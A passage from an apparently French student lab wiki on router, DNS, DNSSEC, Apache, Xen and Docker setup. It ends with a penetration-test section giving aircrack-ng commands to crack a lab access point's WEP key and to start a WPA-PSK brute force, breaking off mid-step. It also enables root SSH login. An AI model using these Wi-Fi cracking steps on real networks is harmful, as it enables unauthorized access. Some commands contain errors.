  ipv6 nd prefix 2001:660:4401:60A3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI104&lt;br /&gt;
  ip address 10.60.104.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 104 ip 10.60.104.3&lt;br /&gt;
  standby 104 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI105&lt;br /&gt;
  ip address 10.60.105.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 105 ip 10.60.105.3&lt;br /&gt;
  standby 105 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 105 par le R1&lt;br /&gt;
  standby 105 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI106&lt;br /&gt;
  ip address 10.60.106.1 255.255.255.0&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 106 ip 10.60.106.3&lt;br /&gt;
  standby 106 priority 150                              # pour faire de l'équilibrage de charge nous faisons transiter en priorité le Vlan 106 aussi par le R1&lt;br /&gt;
  standby 106 preempt&lt;br /&gt;
  ipv6 address 2001:660:4401:60A6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60A6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI131&lt;br /&gt;
  ip address 192.168.222.10 255.255.255.248&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 interface BDI200&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 200 ip 193.48.57.190&lt;br /&gt;
  standby 200 preempt&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  no shut &lt;br /&gt;
  exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers Réseau école =====&lt;br /&gt;
 interface GigabitEthernet0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  media-type rj45&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 131 ethernet&lt;br /&gt;
   encapsulation dot1q 131&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain 131&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
